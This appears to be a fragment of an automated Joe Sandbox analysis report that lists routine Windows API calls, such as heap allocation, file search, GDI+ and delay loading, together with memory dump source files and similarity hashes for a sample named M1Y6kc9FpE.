                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427045233-0
                                                                                                                                                      • Opcode ID: cb3a1ff041b3433c345ce6659e96f8e09ddfcf82e63caa976fed2fbeaf3b93c5
                                                                                                                                                      • Instruction ID: 8c7df39623f874bbe3bbf6e89474dee1b04fd091b937bd4832e68478b1dc2bfc
                                                                                                                                                      • Opcode Fuzzy Hash: cb3a1ff041b3433c345ce6659e96f8e09ddfcf82e63caa976fed2fbeaf3b93c5
                                                                                                                                                      • Instruction Fuzzy Hash: 60018175841248EBDF00EBE4CA86BCE77BCBF18345F444065F400AB182C638AB49CB71
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A500BA,00000001,00000364,?,00A46C16,?,?,?,?,?,00A45269,00A4535E), ref: 00A51E27
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: bc539e3d5c1bde323e6f7c556293fa4e31eaf431d41e51b858fd4e9c87c6a1bd
                                                                                                                                                      • Instruction ID: d82132243ec1c3382064bb9d8ea60c752cd13b72ce3e38a71acd60b1d32acff8
                                                                                                                                                      • Opcode Fuzzy Hash: bc539e3d5c1bde323e6f7c556293fa4e31eaf431d41e51b858fd4e9c87c6a1bd
                                                                                                                                                      • Instruction Fuzzy Hash: DCF0E9326056246BEB215B76AC07F7B7758FF807B2B184121FC08AA190DB70ED0982E0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 08b2b1fa5a63c9ccd1898f29e3eef64d684c95c88ffa2ec68675fda2b104d47e
                                                                                                                                                      • Instruction ID: 4adf5df475aa93c0c13d68039b58a492b96de58ce0293a7e111a3f5a3afb7b65
                                                                                                                                                      • Opcode Fuzzy Hash: 08b2b1fa5a63c9ccd1898f29e3eef64d684c95c88ffa2ec68675fda2b104d47e
• Instruction Fuzzy Hash: 8BF0C2B4A41710BBD621EB288D03F9BBAD8BFC4B00F004929B3586B1C3DBB427018259
APIs
• RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: fff6c84d50a761b3175e3bb0ac510a31200355c3a64328c03094f3f4404b22f2
• Instruction ID: edcdc84eeb54eb0fc8589f8d5b160bca1ac9780601cbefc473acd5a8b15891b2
• Opcode Fuzzy Hash: fff6c84d50a761b3175e3bb0ac510a31200355c3a64328c03094f3f4404b22f2
• Instruction Fuzzy Hash: F9E06D362017219AEA3177A5AD01F9B7A78BF813B2F194120FE4D96192DB70CC4981A2
APIs
  • Part of subcall function 00A2F826: __EH_prolog3_GS.LIBCMT ref: 00A2F830
  • Part of subcall function 00A2F826: FindFirstFileW.KERNELBASE(?,?,00000274,00A2F733,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?), ref: 00A2F859
  • Part of subcall function 00A2F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F8A4
  • Part of subcall function 00A2F826: GetLastError.KERNEL32(?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049,?,00000000), ref: 00A2F902
• FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?,?,?,?), ref: 00A2F739
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Find$FileFirst$CloseErrorH_prolog3_Last
• String ID:
• API String ID: 765066492-0
• Opcode ID: c852a86e485b4a28e4229fbf79dc1cf72dd738e3d6428611f7af70eef003b784
• Instruction ID: b3f901831f2ec55c5fdd9f2c8721338314540760135510e0c0efa4af24918fc2
• Opcode Fuzzy Hash: c852a86e485b4a28e4229fbf79dc1cf72dd738e3d6428611f7af70eef003b784
• Instruction Fuzzy Hash: CDF0A7350097A0AECE215BAC5904A8BBFF06F17371F004B39F4F912192C23094959B22
APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 00A3742D
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
• Opcode ID: 6b3f9cb4b542e110d64b78bd3d3a90e0ae2723d21db1ee7905d75e4b14c7d47c
• Instruction ID: 14bd451fb58273b3816d21e79ab6578bc4896c20f9783365d2f4890febaa7ed8
• Opcode Fuzzy Hash: 6b3f9cb4b542e110d64b78bd3d3a90e0ae2723d21db1ee7905d75e4b14c7d47c
• Instruction Fuzzy Hash: 56D02B1074822076EA21B7293A877FE290A4FC2B21F090035F044531C3DF981C4783E6
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00A21206
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
• Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
• Instruction ID: 386280589dbd64ebdde644e160b9694532a3e7f0c51f7017e692e94794054be0
• Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
• Instruction Fuzzy Hash: 10D05E7A6026228F872CEB78D67686E72945EB4345311863DF02ACAA82EF21CC15C755
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 00A3EB0C
  • Part of subcall function 00A3E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3E86A
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
• Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
• Instruction ID: eaaf43f25b9054ebbef2f6d54fdacfd64e760b727d0257e3f3cb657f8976f7e2
• Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
• Instruction Fuzzy Hash: D2D0A930600209BBDF02AF309C0297EBAA8EF00340F00C021F802852D1EAB0EA10A6A0
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A44256
  • Part of subcall function 00A40678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A40689
  • Part of subcall function 00A40678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4069A
  • Part of subcall function 00A40678: IsDialogMessageW.USER32(00010452,?), ref: 00A406AE
  • Part of subcall function 00A40678: TranslateMessage.USER32(?), ref: 00A406BC
  • Part of subcall function 00A40678: DispatchMessageW.USER32(?), ref: 00A406C6
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: 5c494f8f932f30c6bf2537b703fc6f0338d97edc5a66d2f7d4c3c50941dc2a33
• Instruction ID: 7af027d54cf223c6601caac1a03beaa49dc1c2dd17bb612fd21f24632b31fa10
• Opcode Fuzzy Hash: 5c494f8f932f30c6bf2537b703fc6f0338d97edc5a66d2f7d4c3c50941dc2a33
• Instruction Fuzzy Hash: 70D09E35144300BAD6126B91CE07F0A7AE2EB88B04F008554B749340B1C6A29E71AB12
APIs
  • Part of subcall function 00A44DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00A44DF2
• DloadProtectSection.DELAYIMP ref: 00A44D54
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AcquireDloadExclusiveLockProtectSection
• String ID:
• API String ID: 3680172570-0
• Opcode ID: 28fa8f79c35b7e4509e5a4ad13f5c4464c93e46b0e74c6f7f33f0dc213bb6a08
• Instruction ID: 9f8f531f37f7aff5a2e3c5b730a73cab8a9d10dcba26bb6e5680b2021a5be51f
• Opcode Fuzzy Hash: 28fa8f79c35b7e4509e5a4ad13f5c4464c93e46b0e74c6f7f33f0dc213bb6a08
• Instruction Fuzzy Hash: 96D0127CF00660AFD729EFB49D4F75432A0B38C704F804501F259951A6CFF064919641
APIs
• __EH_prolog3.LIBCMT ref: 00A28187
  • Part of subcall function 00A34F2B: __EH_prolog3.LIBCMT ref: 00A34F32
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 7809d0e19781932ffa1f83651d7a3ba35a1ff984a8be620f9b92f271ab5a86ef
• Instruction ID: 11a1adbf8903635e6c4856235f05b2299a1f3960a74468401a6a66fd628e36ec
• Opcode Fuzzy Hash: 7809d0e19781932ffa1f83651d7a3ba35a1ff984a8be620f9b92f271ab5a86ef
                                                                                                                                                      • Instruction Fuzzy Hash: 6AC012B9E00924C3DB02BF68A60376D2120AB84B02F400568F6005F283CFB84E0183CA
APIs
• GetFileType.KERNELBASE(000000FF,00A2E052,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E15E
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 5edb08bedaa74f1e0c76c10478093fc2bef90eab9c2e386373ba8d0f55162464
• Instruction ID: a9ec50a60c5e0c859c811a2c11835d9996af07c07e3b56b029adff53c2d9303d
• Opcode Fuzzy Hash: 5edb08bedaa74f1e0c76c10478093fc2bef90eab9c2e386373ba8d0f55162464
• Instruction Fuzzy Hash: 74C00234400219DA8E218B2CB8594997622AA627B67B497B4D129895E1C3328DE7EA11
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d50670ee038d97145e04fd0e49d5ea48ed4e18d0f63f02627b478327a7d7f482
• Instruction ID: a072dae85459604b75fe8fb039814d2e6d8094e73826ff3f39a8b5c5b303714c
• Opcode Fuzzy Hash: d50670ee038d97145e04fd0e49d5ea48ed4e18d0f63f02627b478327a7d7f482
• Instruction Fuzzy Hash: C7B012A926C020BC320451343F02E3F012CD1C8F10330CB2AF404C1042D4418E451131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 1dfc296fc10bf950756a3ce9df9d24667f95ca8cd1ed63cbcb95f0516df69e7a
• Instruction ID: e3d23fc68519ae8914717e1cb858db6ce70a2623a37558506594ca4ca479bd2f
• Opcode Fuzzy Hash: 1dfc296fc10bf950756a3ce9df9d24667f95ca8cd1ed63cbcb95f0516df69e7a
• Instruction Fuzzy Hash: 84B0129926D110BC320451343E02E3F012DD1C9F10730CB1AF404C1082D8408C441131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 025d6f17d5470e59e115a08f86ffc23e3cf24dc4ad0852a1ba785561cea40438
• Instruction ID: b6d80f3d326c15d4cb218df237e2a02a25aaa474358931e4e413a1ff9f3dff20
• Opcode Fuzzy Hash: 025d6f17d5470e59e115a08f86ffc23e3cf24dc4ad0852a1ba785561cea40438
• Instruction Fuzzy Hash: D5B0129926C010BC320851743E02E3F022CE1C8F10330CF2AF004C1142E4408C481131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 19a86a655a925ced390f4034b13737f3d2d1a92428aa047bc2bc5b47fac1a958
• Instruction ID: 8c446e29c256fc0cd552481ab42ea2d6e89920002ca43276a641cc7bba8dfcfb
• Opcode Fuzzy Hash: 19a86a655a925ced390f4034b13737f3d2d1a92428aa047bc2bc5b47fac1a958
• Instruction Fuzzy Hash: 34B012A926C120BC320451343E02E3F012CD1C9F10330CB1AF404C1042D4408D441131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ea65a90c9b91c49efd9af3af4db56b11457fd6cf8a2b295a8b9b079f79e3b6aa
• Instruction ID: 5cc5ff0a157b7c63863aa9d9ed1dcef58e71929c8c14428cf7dd2d35205b3d9a
• Opcode Fuzzy Hash: ea65a90c9b91c49efd9af3af4db56b11457fd6cf8a2b295a8b9b079f79e3b6aa
• Instruction Fuzzy Hash: 67B012A926C120BC334451343E02E3F012CD1C8F10330CB2AF004C1442D4408D841131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: cd58d3a3718811d5d01662e0072e5cfc1c01726b43cb98f837b8940b2802459c
                                                                                                                                                      • Instruction ID: 70b26f5af56aabf7720e439e9eecd3b20467b88c1fd920448446e2c1856ffa19
                                                                                                                                                      • Opcode Fuzzy Hash: cd58d3a3718811d5d01662e0072e5cfc1c01726b43cb98f837b8940b2802459c
                                                                                                                                                      • Instruction Fuzzy Hash: 10B012A926D110BC334452343E02E3F012DD1C8F10730CB2AF004C1442D8408C841131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: cc0d1d447205d104c2428434b934f8da9ec72543efdefd194169a57fe289121c
• Instruction ID: d55eb2829aec3320260fe5d033b8f28849409e56f0a42ebba0ec29436919c70a
• Opcode Fuzzy Hash: cc0d1d447205d104c2428434b934f8da9ec72543efdefd194169a57fe289121c
• Instruction Fuzzy Hash: B8B0129927D010BC320451343E02E3F026EE5C8F10730CB1AF004C1042D8408C441131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 304051676e768fcb06157f8367120396e63185b83e1de5d6e423a94a0200b231
• Instruction ID: c11cd342da13df50726f5c55ea65914f4f3f10e9c657b295f93df697a05fd6d9
• Opcode Fuzzy Hash: 304051676e768fcb06157f8367120396e63185b83e1de5d6e423a94a0200b231
• Instruction Fuzzy Hash: B2B0129926C110BC334451347E02E3F023CD1C8F10330CB2AF004C1442D4408C841131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8452911249a99d9a1cd25709167a76d8ad36c318396551ed7874612ee2c0d6ae
• Instruction ID: efef0adee468cbfd558698f2cbe99de82729ac27bf99e37438dae4207fb4b830
• Opcode Fuzzy Hash: 8452911249a99d9a1cd25709167a76d8ad36c318396551ed7874612ee2c0d6ae
• Instruction Fuzzy Hash: 0DB0129926C010BC320451347F02E3F023CD1C8F10370CB2AF404C1042D4418D451131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: df72a7d49a800219086b06d3b552dcfc9843a8b66ed69dbf72c296cd8e5cedcf
• Instruction ID: 1f53a02644231addecff6c5c28ecf919abee1de9f6e3ec7ec2e99041e7841cb5
• Opcode Fuzzy Hash: df72a7d49a800219086b06d3b552dcfc9843a8b66ed69dbf72c296cd8e5cedcf
• Instruction Fuzzy Hash: 25B0129927C110BC320451347E02E3F033CE1C8F10330CB1BF004C1042D4408C441131
APIs
